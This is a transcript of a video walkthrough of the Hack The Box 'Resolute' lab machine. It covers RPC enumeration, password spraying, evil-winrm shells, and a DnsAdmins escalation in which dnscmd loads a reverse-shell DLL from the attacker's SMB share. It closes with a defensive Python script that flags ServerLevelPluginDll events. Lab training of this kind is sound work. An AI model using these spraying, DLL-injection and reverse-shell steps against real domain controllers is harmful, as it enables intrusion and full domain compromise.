HackTheBox - Resolute

IppSec · Intermediate · 🔐 Cybersecurity · 6y ago

Key Takeaways

This video demonstrates an attack on a Windows domain controller using tools such as nmap, smbclient, rpcclient, and CrackMapExec, and showcases techniques for lateral movement, privilege escalation (via the DnsAdmins group), and code execution.

Full Transcript

What's going on YouTube, this is IppSec. I'm doing Resolute from Hack The Box, and I really like this box because it's a medium-level box that is definitely relatively easy as long as you keep looking at what stands out, and also the actual final path is really cool; I like the escalation from DnsAdmins to SYSTEM. That being said, the one thing I didn't like about the box is showing the ramification if you're lazy when you do that final step, because a lot of people just use msfvenom to create a DLL. It didn't have that reverse shell fork out a connection, and when you do this DNS injection this way you're gonna crash the DNS server, and if you crash DNS in a production environment you're gonna have a bad time. So it kind of gave a lot of people a false training of saying, oh, when I'm a member of this group I do this and I get admin. They didn't really see, oh, if I did it this way I get admin but I crash the environment. So at the end of the video we will show how to create an exploit in more of an opsec-safe manner by creating a thread to send the reverse shell, so the program can just resume normal operation. So with that being said, let's begin. The first thing you'll notice is my terminal's a little bit different. This information is automatically populated at my bash prompt: this is the Hack The Box server I'm connected to (if I switched to like a Pro Lab it would have the Pro Lab information here), here's my Hack The Box IP, and then the username of my box and the current working directory of my path, and we have where I begin my input here. The reason for the change is I was just upgrading Kali and the upgrade really did not like it and it just wouldn't boot anymore. I decided to try something new and switch to Parrot, because that's what Hack The Box is officially supporting with their Pwnbox, which is just a customized version of Parrot that runs in a web browser. I kind of took all the customizations and just applied it to a vanilla install of the Parrot Security MATE ISO, and
when I get some time I'll document that customization process so you all can have the same exact thing, but for now, I mean, everything's pretty much the same; all the commands I run here will most likely work on your Kali machine. So with all that being said, let's just begin with our nmap. That is -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it resolute, and then the IP address, which is 10.10.10.169. This can take some time to run so I've already ran it. Looking at the results, we have a handful of ports open. The very first thing we have is DNS on port 53, then we have Kerberos on port 88, Microsoft Remote Procedure Call on 135 and 139, LDAP on port 389, and at this point I am starting to think it's some type of Windows domain controller just based upon all these ports. We also have SMB on 445 and a bunch of other things. Going down here we can get some information about the box: the computer name is RESOLUTE, and it looks like it got that from the SMB OS discovery script, and then we also have the domain name as megabank.local and the FQDN as resolute.megabank.local. So let's go take a look at the hosts file. Let's edit /etc/hosts and we will add 10.10.10.169 and let's add all these names; that should be fine. Save this file, and all that did was let us ping it by hostname. Eventually this may become useful because some things like PowerShell remoting and stuff really like having the hostname, so it always helps to have that configured. We could have also probably edited our resolv.conf file and put a nameserver as 10.10.10.169 so it always went to that server for DNS. Before we go look at other things, let's just start a full port scan, so -p- does all ports, I think that's 1 through 65535 or some insane number. Let's do nmap -oA nmap/resolute-allports 10.10.10.169, and I'm also going to throw a -v flag so I can see open ports as it finds them. I'm just going to open up a new pane here so nmap stays at
the bottom here, and when it finishes it'll just say bash, so handy little tip there. Let's go take a look at open shares, so I'm going to do smbclient -L 10.10.10.169, hit enter, and we get anonymous login successful but we don't have any shares. I was half expecting to see like a SYSVOL share or something since it's a Windows domain controller. We can try like null authentication and nothing really happens there. We can try switching up the tools and using smbmap, and I think it's just -H 10.10.10.169 to see if this sees anything different. Doesn't get anything; it does resolve the hostname to resolute.megabank.local. We can also try rpcclient, so 10.10.10.169 and then just hit enter for the password; we get login failure. We can try null authentication again, which is just not specifying a user, and it actually authenticates us. This is just an old setting on a lot of Windows domains; I think the anonymous user has to be in like the Pre-Windows 2003 compatibility group or something weird like that. Essentially when you upgrade a domain controller this thing may be set; I don't think it's set if you just installed Windows 2016 or 2019 vanilla, but I think if you added the anonymous users to that compatibility group then this would work. The reason being, it's just an old default insecure setting, but some applications actually require this setting to work, so when you upgrade domain controllers Microsoft just didn't change that setting because it may break applications. Anyways, let's just go begin, and there's a bunch of commands we can run here. If you want to know more about rpcclient you can go to ippsec.rocks and then just search rpcclient and you'll get a list of things. But let's just do enumdomusers to dump a list of domain users, and we can copy this to a text file. So I'm just going to do a new pane, vi users, paste, and we can do cat users, pipe it to awk -F and print $1, print $2, and let's just do another
awk -F, and there's probably a better way to sort this file out; I'm just using awk because that's my go-to. I'm going to pipe this to temp, because if I pipe this to the exact file I am cutting it will go to a blank file. So I can show that real quick: cat users > temp; if I cat users again and then redirect this to users itself, something weird happens and it empties out the file. So mv temp users and now we just have a user list. There's other things we could do; like if we did queryuser and specified like steve, it will give us more detailed information. I think there's also a flag that can get like the password policy, but generally to do password policy I just use CrackMapExec, and I think it's smb then --pass-pol 10.10.10.169. See if this works... yep, there we go, and we can see the minimum password length is seven and password complexity not required. The main thing I'm looking for is some type of lockout policy: reset account lockout counter, account lockout threshold none. So seeing this means we can brute force accounts without fear of locking them out, and also if we did lock them out we know there is a counter for 30 minutes and it would unlock. So knowing both of those is always handy before starting any type of brute force. There's other things you can query like querydispinfo; it'll kind of do this queryuser thing and pull a lot of the popular fields and just show them all. querydispinfo, there it is. So this is showing the description for the account, I think this is the sAMAccountName, the full name of the user, and looking at this we can see marko was created and password set to Welcome123!. So I'm just going to take a note of this; I don't think I have CherryTree installed so I'm just doing it in a text file. I don't actually know what querydispinfo2 is; let's see, does querydispinfo3 show anything different? Can we do help querydispinfo3?
I'm not exactly sure what the difference between the dispinfos is, but we got this password, so let's try it out. Exiting rpcclient, we can do crackmapexec smb 10.10.10.169 -u ... what was the password? Oh, well, what do I do here? Exit. I forgot I was in a zoomed session, there we go. Let's go cat notes, and it is going to be marko and the password was Welcome123!, and we get a login failure. We can just specify a text file instead of a username and it's going to try this password for every single user, and I'm mainly doing this because, well, if they set one user to Welcome123! that sounds like a default thing they may set new accounts to, and we can see we get one hit, which is the melanie user. Going back over to our nmap we can see this is not finished yet. There is a Windows PowerShell remoting port that is, I think, 5985 and 5986; I'm just going to specify those two ports because I care about them right now, and the reason why I'm doing this is because we had a hit but it doesn't say pwned next to it, which means we can't get a shell. So the only thing we could really do with this is probably smbmap, I think -d for domain megabank.local, -u melanie, -p for password Welcome123!, and always put the password in quotes because it may have special characters that just get treated weirdly. So I just had a habit, I always put the password in single quotes. Trying her account, let's see if we get anything. Oh, we can now see the SYSVOL share, so we could look at some Group Policy stuff, but C$ and ADMIN$ we don't have access to. If we had access to any of these, or write access, CrackMapExec would probably say pwned next to it. There are other modules in CrackMapExec such as winrm that's going to test all this for us, and we could have specified melanie as the user to speed it up a little bit, but I just wanted to show you it goes through all of them, and then when it hits melanie, if she has the
ability to do Windows remoting it will let us know by saying it has pwned that account. So letting this finish, any minute now, it's probably this one, come on CrackMapExec... there we go, so we can see pwned here. You can also do -x to execute a command, so melanie, to speed it up, we can do the command whoami, and you could also just do a one-liner, so you combine this with like a Cobalt Strike beacon or Empire beacon, so whenever CrackMapExec gets a hit it runs the command. We could also do like whoami /all to see the output and prove it's actually running on this server, since technically, I mean, it knew the domain, knew the user, so it could just fake us out and print that information, but adding this /all flag will show us everything about this. And here is that group that I bet anonymous users is a member of, that Pre-Windows 2000 Compatible Access group. But we have code execution. I'm going to use evil-winrm to get a shell on the box because I just like using this tool. I could probably do PowerShell and New-PSSession or something, but PowerShell on Linux is flaky when doing anything remote, so that's why I still default to evil-winrm. So -u for user melanie and -p for password Welcome123!, and I think it's -h or maybe -i for IP; I always get this flag wrong. Easy check: we can just do evil-winrm -h, and -i is for IP. So running this, and we can just clear out this needless session, but we get a shell as melanie. If you're having trouble with running evil-winrm, if it's not a command or you get dependency issues, I install it with gem, so it's just gem install evil-winrm. So a little helpful hint there if you want to install this. Generally the first thing I always do to test privesc is run winPEAS, and we're going to do that, but I want to do something before that, because there was a big Twitter post that said Seatbelt, one of the old tools for privesc, had a major update, so I haven't actually ran that yet. So let's run
this and see what's really changed, because if you look at this you can see everything with the plus, I think, is new as of like two days ago. So AMSI, antivirus, autoruns, audit policy, DNS cache, .NET stuff, explorer; it's just been massively overhauled. So let's go take a look at this tool. They don't provide the compiled binaries, which is probably smart; you should never really just run public compiled binaries of things that you can compile yourself, because number one, it has a lot of just forensic artifacts that AVs may pick up on, and number two, you may not know exactly what's in it. So let's just compile Seatbelt. Let's go to the GitHub directory, Seatbelt, and open with Visual Studio, and while that opens let's go back to Parrot. We need to probably make a tools directory in this thing, and ifconfig eth0, and then let's do the impacket SMB server. What is the command? smbserver.py -smb2support -user ipsec -password ipsec and then the share name, which will just be, I guess, tools, and then the working directory to share out, which I just do $(pwd) to do my current working directory. Permission denied; need to do that with sudo, and !! is going to run the whole last command. So if I did echo test, if I do this it's going to run that command again. So when I did sudo... or echo whoami, this one might be better, and then sudo... I don't know why I did the echo command; I can just do whoami, then the !! thing, and then sudo like this, so that's gonna run sudo whoami. It didn't work before because this was exiting the sudo call and then running it. The reason why I had done this is because of the second thing I want to show you: there is a $! ... or wait, I thought that was it. echo whoami, echo... maybe $_, and that's going to, I think, pull the last argument. echo test test test, oh we should do test1 test2 test3, so that's going to pull the very last argument, $_, and then I want to say $! did
something... echo, that does something. Anyways, you can kind of get these things. If you want to know more of that stuff, I think if you just search egypt bash tricks... is there a talk, Command Line Kung Fu by egypt? He did a talk, I think it was DEF CON, that he did a talk on this. Let's see, bash tips... no, well, that's a book, that's definitely not it. Let's see, yo, egypt one-liners, I think, yeah, this is a good talk: One-Liners to Rule Them All, so egypt, One-Liners to Rule Them All, DEF CON 26, egypt and Vyrus. So if you want to know more of those little tricks I'd recommend that video. But back to this; where was I? We were running impacket and opening up Visual Studio over here, and we have Seatbelt, so I'm just going to change to Release and build solution, and then we can go in Seatbelt\bin\Release and grab this. 172.16.10.209 is my IP address, I believe... oh no, that's not it... that is it. It's trying to use the user test, so let's just do the user test, there we go, test ipsec... what? Let's try test test. I don't know exactly what's going on there: multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed; disconnect all previous connections. I'm just going to reboot my Windows box, so I'm gonna pause the video and resume once this finishes rebooting. The box has just finished rebooting, so let's try this: test test, path does not exist, oh, we called it tools, there we go. So let's go in the tools directory and we can access this C:\Users\ipsec, and we can copy Seatbelt to this directory, and then we can go back to our shell and do upload tools/Seatbelt.exe and this should upload it. This is an evil-winrm thing; I had expected to see progress, okay, there we go, it just took a second to start uploading. Once this is done we should be able to run Seatbelt, so let's do... upload successful, ./Seatbelt.exe... it's not a valid application for this OS platform. file tools/Seatbelt.exe, weird. cd tools, python3 -m http.server on port 80...
sudo, that's gonna take me a while to get used to. Let's try curl 10.10.14.2, I think it's capital S, Seatbelt.exe. I'm wondering if maybe there's just some issue with the way it uploaded in evil-winrm, so ./Seatbelt.exe, and that looks better. We don't get any response back; this is probably a Microsoft .NET thing now, so let's do cd \Windows\Microsoft.NET\Framework64. I'm just going to do dir; I think that's the path, so we can see v4.0.30319 .NET. Let's see, I'm guessing this is going to be like version 4.5; let's see, not sure exactly what version this is. Let's just change the compile path. So generally when .NET doesn't work I change the framework to either 4 or 4.5; I think this is going to be 4. Yep, okay, so now we can rebuild the solution and copy... test test tools, copy Seatbelt over to a Kali box, a Parrot box, my bad, old habits die hard. So we can now run this version of Seatbelt and see if we get anything different. It's downloading, taking its sweet time. ./Seatbelt.exe, and that's looking better, so we have arguments we want to run, so let's do -group=all. I just pulled that from here: run all enumeration scripts, can be combined with -full. I guess we probably should have done both of those, but let's just see what happens. So it looks like it's running Seatbelt and this could take a little bit, so I'm going to pause the video and we'll just resume when it's done. It's now finished, and we can see it took 98 seconds; I love when these tools have the actual time at the very end. But let's just go look at Seatbelt.exe and go see everything this checks. So we have AMSI; I'm not sure if this means it's running, I'm not sure the purpose of this, but there it is. Antivirus: can't enumerate because the namespace is not available. Trying to enumerate AppLocker, but we get an access denied, probably not doable from a user. A bunch of audit stuff, autoruns, Chrome histories, cloud credentials, CredEnum, credit card stuff,
maybe this is a directory, or maybe directories that a user can write to, I'm not exactly sure what this is trying to tell us. DNS cache, .NET, so we have version 4.6.01586, so I guess this just couldn't execute .NET 3.5 for whatever reason. We have AMSI is disabled, .NET 4 AMSI is disabled, master keys, environment path, environment variables, explicit logon events to this box. So this is definitely handy to identify if like a box is being used or not, so I love seeing logon events. Run commands, file info, some Firefox checks, how long the box has been idle for, so this is probably when I reverted the box, IE stuff, installed products, interesting files; I'm not sure what it uses to determine an interesting file. Let's see, interesting processes: it was trying to list processes but it looks like it got access denied. Internet settings, LAPS; this is going to be local account policies, or local administrator policy; it's essentially something to randomize the local administrator account for workstations so you can't do pass-the-hash with a workstation admin account. The last shutdown, so this is probably when the box was created or maybe tested on Hack The Box, I don't know, but December 4th, 2019, about a year and a half ago. Oh, local GPOs, local groups, and this is just showing group stuff, users, so who's a member of Administrators: a bunch of default stuff. Let's see, that's odd, we have DnsAdmins and we have MEGABANK\Contractors, and this is non-default. You'll notice a lot of Windows default things, their SID ends in like a 500.
This is above 1000, so this isn't default, so the DnsAdmins... the box creator did something unique to this group, so that's probably going to be interesting. So vi notes and we can say DnsAdmins has Contractors, and we can also take this a step further and do rpcclient -U ... 10.10.10.169. We could also just do like whoami on the reverse shell and do it, but that's not interesting. I always like doing things remotely, because if I did commands on this session, my remote session, there's a chance it may be logged through like command line logging or things like that; however, if I have access to enumerate Active Directory from my Kali box there's no way command line logging would detect anything, because this is my box. So I always like being able to do it through things like rpcclient or LDAP. enumdomgroups is going to list all the groups on this box, and there is this Contractors, and we can do querygroup, and then if we just did contractors, I don't think this works; I think you have to use the RID, which is 0x44f, and this is just going to display information about the group. You can do querygroupmem, which stands for members, and this will show the members of the group, and that is RID 451.
So if you did enumdomusers you would see all the RIDs; you'd see ryan is RID 0x451, or you could just do queryuser 0x451 and that will tell you it is ryan. So something unique happened to this box to add ryan to the DNS group, so that's interesting. Local users; maybe this would have showed us that. Logon events, LSA settings, mapped drives, named pipes, network profiles, network shares, NTLM settings; this displays a lot of information now. OS info, Outlook, power-on events; we have a bunch of PowerShell stuff, so we have version 2 installed, which can bypass all logging, version 5 installed, we have a log directory which is C:\PSTranscripts, so let's take a look at that. And see, AMSI is also disabled. Printers, processes, process owners, PuTTY keys, remote desktop stuff, recycle bin, registry, security packages, services, checking if Sysmon is installed, Slack stuff; this definitely collects a lot of useful information, maybe not useful information for privesc, because I mean Slack, Firefox, Chrome, but on an actual engagement I could definitely see big uses for this. We also have WSUS settings, WMI filters, but that is quite a bit of information this queried in a minute and a half. But let's go take a look at the other tool, which is winPEAS, to see what this found. So the main thing I want to see is probably the DnsAdmins group and/or the Contractors group that's a member of DnsAdmins, and I also wanted to see the PowerShell history; so these are two things I'm making sure winPEAS... So /opt/privilege-escalation-awesome-scripts, I'm just going to do find and we'll grep for winPEAS.exe, and then we can copy this to htb/resolute/tools, and we can just do curl 10.10.14... tool, I think I said tool... 10.10.14.2,
winPEAS.exe -o winpeas.exe, and curl is just a PowerShell 5 thing, I think, maybe it's 4. But you could also do like New-Object Net.WebClient .DownloadFile http://10.10.14.2/winPEAS.exe and then I'll just call it test.exe. So that's another way you can download files; there's just a bunch of ways you can do it in PowerShell. I'm not sure exactly what the exception is, New-Object Net.WebClient, maybe this is removed or disabled, but curl is a lot less of a thing to type, so that's why I use curl. I don't think the extension matters; not sure exactly what it's erroring on, but let's just move on and do winPEAS.exe and we can see what this finds. I don't think this one's going to tell us how long it took; however, the colors are super nice. I wish there was kind of a combined version of Seatbelt and winPEAS that had colors, but I don't think that exists. So pause the video again and let this run and then we'll come back to it. It's now finished, and I think it took a little less time but not that much, so I'm just going to search back for winPEAS and we will take a look at everything this finds. So we got system information and right at the very top we have PowerShell settings, so it checks both versions and also this C:\PSTranscripts directory. Audit settings, Windows Event Forwarding, LAPS, Credential Guard, cached creds, environment variables, AV information, UAC; so this looks like it's doing a pretty good job at catching everything Seatbelt did, except I think it displays it a bit better. That being said, always run both tools, because I don't think this is doing all like that Chrome, PuTTY, DPAPI keys, etc. We have password policy that shows password length; I think that may be wrong, I think it was seven, so I don't know exactly what that is. I got some type of error message, bunch of stuff, modifiable services; I didn't see anything in red. I'm going through this quicker than Seatbelt because this is colored and I know colors stick out and those are
things I should definitely look for. Oh, this looks like it does find DPAPI master keys, so not too much there. The main thing we want to look for is, let's see, Contractors. So Seatbelt detected Contractors; Contractors was never displayed in the winPEAS stuff. That may be a flag we just missed, or maybe it just doesn't look for things like that. That being said, let's just move on and go to that C:\PSTranscripts directory. So do a dir, you don't see anything; gci, which is Get-ChildItem, it's just shorthand. I think it's like this, come on, return... maybe it's Get-ChildItem... pwsh, Get-ChildItem, yeah, Get-ChildItem is what it is. So Get-ChildItem is just the long notation of gci; it's got a -Hidden flag which shows hidden files and folders. So we can see, doing it again with -Hidden, we see $Recycle.Bin, Documents and Settings, ProgramData, this PSTranscripts directory, Recovery, System Volume Information; we just get a lot more information with -Hidden. So let's go into PSTranscripts, gci -Hidden, we got 20191203, and if we remember like the last shutdown time, let's see, is that here? 12/4/2019.
So this PowerShell transcript history was one day before the shutdown, so chances are that's when this machine was created, so having a little forensic timeline like that is always helpful. So let's do gci -Hidden again and we have this PowerShell transcript, so I'm just going to do gc for Get-Content, and then we can copy this and paste, and gc space, and let's just go down through this transcript. So we can see the user that ran this, Invoke-Expression doing -join, PS doing something, and we can see the start of a PowerShell shell, and now running the command Invoke-Expression command and doing cmd /c net use X: \\fs01\backups ryan and a password. So let's go copy this, add this in the notes, and we probably just want to copy that. Just going down, looks like we get standard out here saying the syntax is wrong for that command, and that's the end of the transcript. So we can check that password, that account, with again CrackMapExec; let's just do, I guess, smb since that's what's there, ryan -p, and see what this says. Looks like it got a shell right away; I was actually not expecting that. Let's see, does -x work here? I'm not sure if it works on the SMB module. Let's do impacket psexec... do I not have... yes, psexec, okay, psexec.py ryan@10.10.10.169,
paste the password. I'm honestly not sure why it says pwned there. Is there a --shares module? So I'm hoping this will list what CrackMapExec thinks the shares are. See, READ, READ, doesn't say WRITE, so I'm not sure exactly what's going on here, but we definitely don't have access to do that. We could look at winrm, and winrm will probably correctly say pwned; if it doesn't say pwned I'll just be really confused. winrm doesn't support this --shares, so let's just get rid of that. And let's see, this nmap command with -p- is still running, it's saying only like 30% done, so that's why I don't always do that -p-. So winrm works as well. Let's clean this up a little bit; I got my shells everywhere and I don't like having shells everywhere. So let's see, let's create a new pane and I'm going to send this to pane, I think, 3... what, send to 3, can't join... I don't know why my send-pane isn't working, weird. I did the same thing on that window... I don't know what I was doing but that worked. So this is going to be servers, this is shell melanie, and this will be shell ryan; so just a way to stay organized. evil-winrm ryan -p, don't have that password saved but it is right here, -i 10.10.10.169. And you'd be surprised with how much more efficient you'll be if you start, every now and then, just taking a few seconds to clean up how your windows are organized. So this is generally my recon at one, two; this is gonna be where I run all my services like HTTP, SMB; this is a low-priv shell; this is a high-priv shell or a different shell. So this user was a member of the DnsAdmins group, and let's see, DNS, or maybe I need to... oh, [inaudible]... member of MEGABANK\DnsAdmins, and early in the video we found out this Contractors group was a member of this, and this is a special group. If we go Google this, DnsAdmins privilege escalation, you can read a bunch of posts about how this group can be used to load a DLL off a network path
and then get code execution. So they're using msfvenom here, and this works; I don't exactly like this. We're gonna do it both ways, but this can actually hang the DNS server, I believe, so always be careful when doing this. So let's go into tools... actually, let's do exploits, and let's see, shell_reverse_tcp, this should be fine, just need to change the IP to 10.10.14.2, LPORT to be 9001, and I'm just going to call this rev.dll instead of privesc. See if this generates... file rev.dll, okay. I just always like doing file against it to make sure it's what I expect; it may be in a different format, like if it's raw it'll just say like text or something. So let's do rev2. Let's go back to servers and we'll do impacket smbserver. Oh, we're not going to do user and password because I want to make this accessible to anonymous users; if I did user and password we could have some type of weird issue. So it's gonna be PleaseSubscribe as the share name, and then we'll do $(pwd) here, but I did not go into the exploits directory so I want to do that before running this impacket thing. So there is, I think, one important thing: if we went to actually get the, I guess, user.txt to root.txt, there is a note and it says due to a change freeze any system changes will be automatically reverted within one minute. So whatever we're doing here we have to be fast because the system's reverting things every minute. So if we scroll down, this is going into how we host it with SMB server, dnscmd, and I don't know if we need this FQDN because we are doing it locally. Let's see, what is it, LOLBins, let's see, because dnscmd is also here. Okay, I think we may need the path, so let's go back to the reverse shell: dnscmd, was it megabank.local, and then the shell was called rev.dll. And remember a minute ago, or two minutes, we did -f raw and you can just see it says data, so if it ever does the wrong format you can end up debugging it for quite a while; so that's why I just like checking it right away. So
rev.dll, and we called it, I think, exploit... we called it PleaseSubscribe, and then the IP, which is 10.10.14.2. That looks good. Start a listener on 9001; does not look like it worked. Let's try 127.0.0.1, do we do it with an IP? Okay, sc.exe stop DNS, and then we can do start DNS to restart the DNS service, and we get a reverse shell as SYSTEM. However, if we do nslookup resolute 127.0.0.1 we're gonna hang, because we just crashed... well, the DNS server never fully starts. If we exit the session it should finish and work, or maybe we just hosed it and we have to wait that full minute for it to be reverted. Let's try it again; there, it works. So we can do everything again to show, again, this is definitely causing an issue. Start, and we do this nslookup, doesn't work; as soon as we exit the shell we should get a response in three, two, one... nope, but we're definitely causing some type of system issue. And the reason is, when you do DLL injection you're kind of hijacking the execution path. So the DNS service is starting up and that's going to load that DLL, and that DLL isn't forking or setting up a thread; it's just doing that reverse shell, and it doesn't continue progress until the reverse shell dies. So also, if the DLL doesn't return the return code this thing is expecting, it may just not start the service; it may just stop right there. So the solution, to be able to do this without hanging the DNS server, is to, in Windows, create a thread and then run the reverse shell in that thread so the DNS server resumes normal operations. And also, I think this is just attaching on, like, or executing code on the DLL attach, and to do DLL injection, I guess, properly you should inject exactly on the function that's being called. So I'm going to see if I can find this post real quick, DNS EXE Persistence; one of these posts will say the function... rundll32... so it's running this DnsPluginInitialize function. And essentially this is both a lateral movement and a privilege escalation, because you can
remotely add a plugin to the DNS server to execute code. Only the DNS admins can do it, but typically DNS admins are just expected to edit the DNS things, like, say, oh, this host is no longer at this IP address, it's now this IP address, things like that. You don't expect them to upload a malicious plugin to get code execution. It's a lot like saying you have a malicious... or you have a WordPress server on a website, you give someone administrative rights to WordPress but you don't give them administrative rights to the box that WordPress is running on. However, because they're admin on WordPress they can upload a malicious plugin that executes code on that underlying server, giving them a shell. So you didn't give them the right to get that, but you gave them a right that allows them to get it, essentially. So again, this is just allowing DNS admins to execute code on the domain controller, which is something they typically can't do, and generally when you execute code on a domain controller you're pretty much just global admin at that point. So that's what this is doing, and we're going to use it as a privilege escalation, but keep in mind if you have this group and you own, like, a workstation, you can just install this dnscmd command and then have the domain controller load your plugin remotely, and then when DNS restarts you get a shell on that box. So with all that being said, I'd highly recommend reading this whole post, because it's going to go into it in a bit more detail, but we're just going to do the exploit. So I'm going to go grab this DNS-EXE-Persistence code. So let's open up command prompt, GitHub, or desktop GitHub, git clone and go in here... well, we don't really want to go in there, we just want to open up Visual Studio. Tools, oh, not tools, GitHub, DNS-EXE-Persistence, open this up with Visual Studio, and it asked me to upgrade, yeah, the platform toolset, that should be fine. And we can see the code and, oh God, what language is this in? Yeah, I'll be fine. So Meterpreter is probably putting
well, not much... msfvenom's probably putting the code here, which is fine; it'll probably execute whenever the DLL does the process attach call, but the correct place to do it is this DnsPluginInitialize stage, because that is what the DNS server is asking for. So let's add code here, and what we have to do is get a reverse shell. We could just have it execute a file with system() and be lazy, but let's do this all within C. So I'm just going to search for "C++ reverse shell" and let's see, go to the first two and see what these are. Looking for one that's lazy, that just has everything in main. So let's grab all of this, grab the includes too, and I'm going to create a new item, C++ file. I should rename that, that's not source.cpp, let's call this revshell. Okay, our IP address, we're gonna do 10.10.14.2, port 9001, and I'm going to change this from int main because this is no longer the start of the program; we want to call this as just a function and we also want to call this as a thread. So this will be revshell, and we also have to change this from int to DWORD WINAPI, and then we're going to eventually pass this a pointer, so let's do lpParameter. That looks fine. The next step we have to do is create the header file, so let's add new item, header, we can call this revshell.h, paste that in, and then in this all we should have to do is include revshell.h and, let's see, let's define our handle, then we can do thread ID and create the thread. So CreateThread: security attributes, thread attributes, function revshell, parameters, creation flags, and the ID. So this should create a thread, which is essentially like a fork, and run the reverse shell code, so essentially it says do the reverse shell while continuing the program. If we just did, like, we just did revshell, we'd have the same issue as before, where it just hangs there. So let's change it to Release and pray that it builds. Are you building? Let's see, unexpected end of file with this, maybe we have to return zero,
maybe, let's return something, and we may have to add that declaration, include stdafx.h, s-t-d-a-f-x. Build. Okay, rebuild was successful, so let's go see C:\Users, DNS-EXE-Persistence, Release, and let's see, 9:11. Copy that. We're actually going to have an issue right now, because this Windows is configured to not do any guest authentication to SMB, so if I try to go to this it says we can't access it. So let's quickly switch back to our VM, go to the servers tab, and we can do SMB to support user test, password test, and we can change this to be tools. Okay, tools, awesome, copy, and we'll call this one revthread.dll. And there's probably an msfvenom flag or something to generate something that does it in a thread or something; seriously, I don't use msfvenom all that much. So let's see that "Please Subscribe" is done, let's listen, and it was revthread.dll. Command successful. Stop DNS, start DNS, hopefully get our shell. We do, and DNS is working. Is it time? echo date... I don't think I want date. Okay, that works. So let's see, I want to do this right at the start, so it's been a minute, it should be restarted. I just want to go for good measure and make sure this works. So revthread, stop first, start. I probably wasted over a minute now. Date, yeah, 30 seconds, so you can see DNS is working. So let's try it one last time, and this time we will try it with rev.dll. Actually, let's do it with all the changes removed. So I just edited way too much. Edit, what's the redo hotkey? Ctrl+Y. int main, see, IP, port, so this can be int revshell like that, we can return zero, that looks fine. Let's go to our header, this no longer has any parameters, okay, and let's go to the project, we just do revshell. So let's see what happens with this. Rebuild the solution. We need to include stdafx.h. Oh God, we screwed something up. Sometimes, I know I've said this before, I really hate when I go outside my comfort zone. Let's see it, revshell, I wonder if we just didn't copy something. See, let's simplify this, delete,
delete, yeah, revshell.h, go here, and we will go back to our reverse shell code, copy the includes, delete that include, 10.10.14.2, 9001, and we can just copy this code. Definitely not as clean, but at least this should compile without me having to debug this. Rebuilt, awesome. We have to go back to Parrot, switch to server, copy this and let's just rename it to rev2.dll; sometimes I'm not creative. So, up, the other share, date, oh, let's wait till a new minute, 45. Okay, so now we should be good. Let's do rev2.dll, then stop DNS, start DNS, and nslookup. You can see it's obviously not working, because we did not thread it. So that will be the video. Hope you guys enjoyed it, take care, and I will see you all next week.
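The video shows the attacker side of the DNSAdmins technique: dnscmd points the DNS server at a DLL on a network share, and the service loads it at the next restart. From the defender's side the same sequence leaves a small, specific trail, so here is an added triage script (not code from IppSec's video or from the DNS-EXE-Persistence project) that rates Windows DNS Server events touching the ServerLevelPluginDll setting. It assumes the commonly documented event IDs (541 in the Microsoft-Windows-DNS-Server/Audit channel for a server-level setting change, 770 in the DNS Server channel for a plugin load), which you should confirm against your own servers; the sample events are constructed and the message wording is assumed, so matching keys on the setting name and the DLL path rather than on exact Microsoft text.

```python
"""Triage Windows DNS Server events for ServerLevelPluginDll changes.

Added example for the DNSAdmins technique discussed in the video; it is not
code from IppSec or from the DNS-EXE-Persistence project. The sample events
below are constructed; the message wording is assumed, so the regexes key on
the setting name and the DLL path rather than on exact Microsoft text.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Event IDs as commonly documented for the Windows DNS Server role:
#   541 (Microsoft-Windows-DNS-Server/Audit): a server-level setting was changed
#   770 (DNS Server): a plugin DLL was loaded at service start
# Assumption: verify both against your own servers' logs before relying on them.
SETTING_CHANGED = 541
PLUGIN_LOADED = 770

SETTING_RE = re.compile(r"serverlevelplugindll", re.IGNORECASE)
# UNC path (\\host\share\file) or a drive-letter path; trailing sentence
# punctuation is stripped by extract_path().
PATH_RE = re.compile(r'(\\\\[^\s"]+|[A-Za-z]:\\[^\s"]+)')


@dataclass
class Finding:
    event_id: int
    severity: str
    path: str
    reason: str


def classify_path(path: str) -> Tuple[str, str]:
    """Rate a plugin DLL path: a network path is the worst case, because the
    service then loads remotely hosted code at the next restart."""
    p = path.lower()
    if p.startswith("\\\\"):
        return "high", "plugin DLL loaded from a UNC/network path"
    if not p.startswith("c:\\windows\\system32\\"):
        return "medium", "plugin DLL outside %SystemRoot%\\System32"
    return "low", "plugin DLL under System32; confirm it is an approved plugin"


def extract_path(message: str) -> str:
    """Return the first UNC or drive-letter path in the message, or ''."""
    m = PATH_RE.search(message)
    return m.group(1).rstrip(".") if m else ""


def triage(events: List[Dict]) -> List[Finding]:
    """Turn raw events (dicts with EventID/Message) into rated findings."""
    findings: List[Finding] = []
    for ev in events:
        eid = ev.get("EventID")
        msg = ev.get("Message", "")
        if eid == SETTING_CHANGED and SETTING_RE.search(msg):
            path = extract_path(msg)
            if not path:
                # A cleared value is worth a look too: clean-up looks like this.
                findings.append(Finding(eid, "medium", "", "ServerLevelPluginDll cleared"))
                continue
            sev, why = classify_path(path)
            findings.append(Finding(eid, sev, path, "setting changed: " + why))
        elif eid == PLUGIN_LOADED:
            path = extract_path(msg)
            sev, why = classify_path(path) if path else ("medium", "plugin load with unparsed path")
            findings.append(Finding(eid, sev, path, "plugin loaded: " + why))
    return findings


# Constructed sample events (not real log output). The first two mirror the
# video's flow: the setting is pointed at a DLL on an SMB share, then the
# restarted service loads it. The last two are benign noise.
SAMPLE_EVENTS = [
    {"EventID": 541, "Channel": "Microsoft-Windows-DNS-Server/Audit",
     "Message": r"The setting serverlevelplugindll on scope . has been set to \\10.10.14.2\share\rev.dll."},
    {"EventID": 770, "Channel": "DNS Server",
     "Message": r"The DNS server loaded the plugin DLL \\10.10.14.2\share\rev.dll."},
    {"EventID": 541, "Channel": "Microsoft-Windows-DNS-Server/Audit",
     "Message": r"The setting serverlevelplugindll on scope . has been set to C:\Windows\System32\dnsplugin.dll."},
    {"EventID": 541, "Channel": "Microsoft-Windows-DNS-Server/Audit",
     "Message": r"The setting forwarders on scope . has been set to 10.0.0.1."},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] event {f.event_id}: {f.reason} ({f.path or '-'})")
```

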